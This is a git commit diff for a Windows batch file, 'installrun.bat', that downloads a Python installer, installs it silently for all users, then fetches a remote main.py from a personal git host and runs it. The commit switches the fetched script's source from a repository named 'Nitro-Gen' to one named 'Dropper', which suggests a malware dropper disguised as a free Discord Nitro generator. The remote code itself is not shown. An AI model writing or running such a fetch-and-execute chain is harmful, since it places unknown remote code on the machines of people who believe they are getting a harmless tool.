Update installrun.bat
This commit is contained in:
parent
e062367106
commit
72cedad92b
|
@ -1,5 +1,5 @@
|
||||||
powershell /c irm -uri "http://www.python.org/ftp/python/3.12.6/python-3.12.6-amd64.exe" -outfile "amd.exe"
|
powershell /c irm -uri "http://www.python.org/ftp/python/3.12.6/python-3.12.6-amd64.exe" -outfile "amd.exe"
|
||||||
powershell /c irm -uri "http://git.kevinthe.horse/heckeralt/Nitro-Gen/raw/branch/main/main.py" -outfile "main.py"
|
powershell /c irm -uri "http://git.kevinthe.horse/heckeralt/Dropper/raw/branch/main/main.py" -outfile "main.py"
|
||||||
amd.exe /quiet InstallAllUsers=1 PrependPath=1 AssociateFiles=1
|
amd.exe /quiet InstallAllUsers=1 PrependPath=1 AssociateFiles=1
|
||||||
python -m pip install requests
|
python -m pip install requests
|
||||||
python main.py
|
python main.py
|
||||||
|
|
Loading…
Reference in New Issue